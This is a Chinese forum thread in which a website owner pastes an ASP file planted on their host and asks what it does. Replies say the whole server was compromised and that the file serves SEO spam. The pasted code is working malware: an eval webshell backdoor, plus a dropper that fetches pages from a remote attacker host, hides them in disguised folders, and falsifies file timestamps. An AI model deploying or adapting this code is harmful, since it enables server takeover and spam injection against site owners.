根目录下被放置木马!?

oreax 发布于 2014/08/07 15:53
阅读 356
收藏 0

根目录被放置asp程序,首页的htm代码后面多了很多污七八糟的链接

请问这是什么木马?有啥危害(目前仅发现htm页面被加了很多链接)?我的虚拟主机是linux的,没有web程序,仅有一个htm页面,一般是怎么入侵的?通过ftp?

admin_inc_data.asp代码如下:

Hello Manage <%eval request("seo1")%>

test11<%







Server.ScriptTimeOut = 1500

randomize

api="http://yanjing.jpshell.com/"

dqurl=GetLocationURL()

dqml=Replace(dqurl,"a.asp","") 



if request.QueryString("zt")="1" then

	response.Write("<div style='margin:0px;background:#00FF00'><center>ok</center></div>")

end if





If request.QueryString("id")="surl" And request.QueryString("ppath")<>"" Then

	Dim ppath,sour,dest,x_data

	ppath = Split(request.QueryString("ppath"),"@")

	sour = ppath(0)

	dest = ppath(1)



	

	x_data=""

	x_data=GetURL(api&"/"&sour)

	savefile "./"&dest,x_data

End If



If request.QueryString("id")="del" And request.QueryString("ppath")<>"" Then

	Set fso = CreateObject("Scripting.FileSystemObject")

	fso.DeleteFile(Server.mappath("./"&request.QueryString("ppath")))

	Set fso = Nothing

End If



if request.QueryString("sc")="1"  then



	if request.QueryString("num")<>"" then

		snum=clng(request.QueryString("num"))

	else

		snum=50

	end if

	

	if request.QueryString("brand") <> "" then 

		brand = request.QueryString("brand")

	else



			brand="omega"

	end if



	if request.QueryString("di") <> "" then 

		di = request.QueryString("di")

		else



			di="8"

	end if



	if request.QueryString("gao") <> "" then 

		gao = request.QueryString("gao")

		else



			gao="9"

	end if

	

	ii=0

'fileatt(filepath,filename,filetime,fileshuxing)	

	file_qian = brand&"-"

	while(ii<snum)

		PATH=sclx(Rand2(1,9))

		'File URL

'		file_qian=GetURL(api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&html=qian")

'		response.Write api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&html=qian"&"<br>"

'		if file_qian<>"" then

'		file_qian = file_qian&"-"

'		else

'		file_qian = brand&"-"

'		end if

		wz_data=""

'		wz_data=GetURL(api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&brand="&brand)

	wz_data=GetURL(api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&brand="&brand&"&di="&di&"&gao="&gao&"&htmlurl="&"http://"&Request.ServerVariables("SERVER_NAME")&PATH&file_qian&"index.html&shellurlapi="&dqurl)

		ss=savefile(PATH&file_qian&"index.html",wz_data)

		response.write Server.MapPath("/")&PATH&file_qian&"index.html"&"<br>"

		createasa PATH&file_qian&"index.html"

		GetURL(api&"api/zq_bg_url.php?url="&"http://"&Request.ServerVariables("SERVER_NAME")&PATH&file_qian&"index.html&urlapi="&dqurl)

'Server.MapPath("/")&PATH&file_qian&"index.html"

		ii=ii+1

	wend

	

response.Write("over#"&now())



end if



'GetURL(api&"api/zq_bg.php?url="&dqurl)





Function GetURL(url) 

Set Retrieval = CreateObject("Microsoft.XMLHTTP") 

With Retrieval 

.Open "GET", url, False

.Send 



If Len(.responsebody) > 0 then

	GetURL = BytesToStr(.responsebody,"gb2312")

end if

'GetURL = .responsebody

if len(.responsebody)<100 then

	'response.write ""

	'response.end

end if

End With 

Set Retrieval = Nothing 

End Function



Function BytesToStr(body, charset)

    Dim objStream

    Set objStream = Server.CreateObject("Adodb.Stream")

    objStream.Type = 1

    objStream.Mode = 3

    objStream.Open

    objStream.Write body

    objStream.Position = 0

    objStream.Type = 2

    objStream.Charset = charset

    BytesToStr = objStream.ReadText 

    objStream.Close

    Set objStream = Nothing

End Function

Function GetLocationURL() 

Dim Url 

Dim ServerPort,ServerName,ScriptName,QueryString 

ServerName = Request.ServerVariables("SERVER_NAME") 

ServerPort = Request.ServerVariables("SERVER_PORT") 

ScriptName = Request.ServerVariables("SCRIPT_NAME") 

Url="http://"&ServerName 

If ServerPort <> "80" Then Url = Url & ":" & ServerPort 

Url=Url&ScriptName 

If QueryString <>"" Then Url=Url&"?"& QueryString 

GetLocationURL=Url 

End Function 



function savefile(filename,datas)

	On Error Resume Next

	Set fso = Server.CreateObject("scripting.filesystemobject")

	set f=fso.Getfile(filename)

	f.Attributes = 0

	Set Obj = Server.CreateObject("adod" & "b.S" & "tream")

	Obj.Type = 2

	Obj.open

	Obj.Charset = "gb2312"

	Obj.Position = Obj.Size

	Obj.writetext = datas

	Obj.SaveToFile  Server.Mappath(filename), 2

'	Obj.SaveToFile  filename, 2

	Obj.Close

	Set Obj = Nothing

	set f=Nothing

	set file=Nothing

	Set fso = Nothing



end function



function CreateFolder(Folder)

Dim FsObject

  Dim tmpFolder

  Set FsObject=server.CreateObject("Scripting.FileSystemObject")

  tmpFolder=server.mappath(Folder)

  If Not FsObject.FolderExists(tmpFolder) Then

     FsObject.CreateFolder(tmpFolder)

     Set f = FsObject.GetFolder(tmpFolder)

     f.Attributes=1+2+4+32

  End If

end function



Function Rand2(lowerbound,upperbound)

Randomize

  Rand2 = Int((upperbound - lowerbound + 1) * Rnd + lowerbound)

end function



function rand3()

	Const cAmount = 36

	Const cCode = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"

	Dim vCode(3), vCodes    

	For i=0 To 2    

	 vCode(i) = Int(Rnd * cAmount)    

	 vCodes = vCodes & Mid(cCode, vCode(i)+1, 1)    

	Next    

	rand3 = vCodes    

end function



function sclx(nun)

	select case nun

		case 1

			strs="/files/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 2

			strs="/css/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs		

		case 3

			strs="/file/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 4

			strs="/index/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 5 

			strs="/images/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 6 

			strs="/js/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 7 

			strs="/data/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs	

		case 8

			strs="/index/"

			CreateFolder(strs)

			strs=strs&year(now)&"-"&month(now)&"/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 9 

			strs="/html/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs	

		case else 

			strs="/html/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

	end select

end function

Function createasa(file1)

	On Error Resume Next

	Dim file2

	file2 = file1

	Set fso = Server.CreateObject("scripting.filesystemobject")

	set f=fso.Getfile(Server.MapPath("/")&file2)

	f.Attributes = 0

	newTime = "12/30/2099 12:30:30"

	SetFileTime(file2)

	set f=fso.Getfile(Server.MapPath("/")&file2)

	f.Attributes=1

'	response.write "锁定文件成功"

	Set shell=Server.CreateObject("Shell.Application") 

	Set app_path=shell.NameSpace(server.mappath(".")) 

	Set app_file=app_path.ParseName(fileName) 

	app_file.Modifydate=newTime 

	set f=Nothing

	Set fso = Nothing

End Function

%>



加载中
0
leo108
leo108

整台服务器被入侵,不是单独针对你的,换个空间商吧。

0
雨翔河
雨翔河
全被拿下了的节奏。
0
oreax
oreax

引用来自“leo108”的评论

整台服务器被入侵,不是单独针对你的,换个空间商吧。

什么意思?这是什么功能的代码?
0
卖爷爷的老红薯
卖爷爷的老红薯
看不懂,就没必要去研究了。这些代码,都是为了 seo的目的,而seo的目的是为了赚钱。你既然不是学这门语言的,就算啦。
返回顶部
顶部